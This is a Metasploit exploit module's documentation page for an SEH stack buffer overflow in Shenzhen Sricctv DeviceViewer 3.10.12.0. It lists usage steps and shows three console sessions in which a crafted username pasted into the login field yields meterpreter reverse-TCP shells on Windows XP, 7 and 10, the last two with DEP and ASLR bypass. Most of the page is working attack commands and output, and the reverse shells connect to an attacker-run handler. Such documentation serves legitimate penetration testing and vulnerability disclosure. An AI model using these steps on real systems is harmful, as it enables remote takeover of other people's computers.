Files
2020-05-11 22:15:51 +02:00

8.9 KiB

Vulnerable Application

This module exploits a SEH stack buffer overflow in Shenzhen Sricctv Technology DeviceViewer version 3.10.12.0. By creating a specially crafted "Username" and copying its value in the DeviceViewer's "User" login field, an attacker will be able to gain arbitrary code execution in the context of currently logged-in user.

Link to vulnerable software EDB - VoidSec

Verification Steps

Example steps in this format (is also in the PR):

  1. Install the application on the target machine
  2. Start msfconsole
  3. Do: use exploit/windows/fileformat/device_viewer
  4. Do: set payload [windows/meterpreter/reverse_tcp]
  5. Do: set LHOST [IP]
  6. Do: exploit
  7. This file will be created: DeviceViewer_v.3.10.12.0_exploit.txt stored at /home/[USER]/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt
  8. Do: use exploit/multi/handler
  9. Do: set payload [windows/meterpreter/reverse_tcp]
  10. Do: set LHOST [IP]
  11. Do: exploit
  12. Do: on the target Windows machine open Device Viewer
  13. Device Viewer's will present a login prompt
  14. Do: paste the content of DeviceViewer_v.3.10.12.0_exploit.txt in the "User" field
  15. Do: press the "Login" button
  16. The handler will receive the newly created session as the Windows currently logged-in user

Options

FILENAME

The file name

Scenarios

Shenzhen Sricctv Technology DeviceViewer v.3.10.12.0 on Windows XP Pro x86 v.5.1.2600 SP 3 Build 2600 (ASLR and DEP are disabled on default configuration)

msf5 > use exploit/windows/fileformat/device_viewer 
msf5 exploit(windows/fileformat/device_viewer) > set target 2
target => 2
msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.4
lhost => 192.168.0.4
msf5 exploit(windows/fileformat/device_viewer) > show options

Module options (exploit/windows/fileformat/device_viewer):

   Name      Current Setting                       Required  Description
   ----      ---------------                       --------  -----------
   FILENAME  DeviceViewer_v.3.10.12.0_exploit.txt  no        The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.4      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   2   DeviceViewer v.3.10.12.0 - Windows XP Pro x86 SEH


msf5 exploit(windows/fileformat/device_viewer) > run

[*] Creating 'DeviceViewer_v.3.10.12.0_exploit.txt' file ...
[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /root/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt

msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.4
lhost => 192.168.0.4
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.4:4444 
[*] Sending stage (176195 bytes) to 192.168.0.244
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.244:1065) at 2020-05-07 14:25:38 +0200

meterpreter > sysinfo
Computer        : SYSOP-D8827A2B3
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: SYSOP-D8827A2B3\Administrator

Shenzhen Sricctv Technology DeviceViewer v.3.10.12.0 on Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601 (Windows enforces ASLR and DEP automatically on default configuration)

msf5 > use exploit/windows/fileformat/device_viewer 
msf5 exploit(windows/fileformat/device_viewer) > set target 1
target => 1
msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.4
lhost => 192.168.0.4
msf5 exploit(windows/fileformat/device_viewer) > show options

Module options (exploit/windows/fileformat/device_viewer):

   Name      Current Setting                       Required  Description
   ----      ---------------                       --------  -----------
   FILENAME  DeviceViewer_v.3.10.12.0_exploit.txt  no        The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.4      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   1   DeviceViewer v.3.10.12.0 - Windows 7 (DEP + ASLR Bypass)


msf5 exploit(windows/fileformat/device_viewer) > run

[*] Creating 'DeviceViewer_v.3.10.12.0_exploit.txt' file ...
[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /root/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt

msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.4
lhost => 192.168.0.4
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.4:4444 
[*] Sending stage (176195 bytes) to 192.168.0.219
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.219:49206) at 2020-05-08 10:29:18 +0200

meterpreter > sysinfo
Computer        : WIN-C70LNBNJMC8
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN-C70LNBNJMC8\Admin

Shenzhen Sricctv Technology DeviceViewer v.3.10.12.0 on Windows 10 Pro x64 v.1909 Build 18363.720 (Windows enforces ASLR and DEP automatically on default configuration)

msf5 > use exploit/windows/fileformat/device_viewer 
msf5 exploit(windows/fileformat/device_viewer) > set target 0
target => 0
msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.0.4
lhost => 192.168.0.4
msf5 exploit(windows/fileformat/device_viewer) > show options

Module options (exploit/windows/fileformat/device_viewer):

   Name      Current Setting                       Required  Description
   ----      ---------------                       --------  -----------
   FILENAME  DeviceViewer_v.3.10.12.0_exploit.txt  no        The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.4      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   DeviceViewer v.3.10.12.0 - Windows 10 (DEP + ASLR Bypass)


msf5 exploit(windows/fileformat/device_viewer) > run

[*] Creating 'DeviceViewer_v.3.10.12.0_exploit.txt' file ...
[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /root/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt

msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.4
lhost => 192.168.0.4
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.4:4444 
[*] Sending stage (176195 bytes) to 192.168.0.61
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.61:49851) at 2020-05-07 15:40:48 +0200

meterpreter > sysinfo
Computer        : DESKTOP-81HH37O
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-81HH37O\user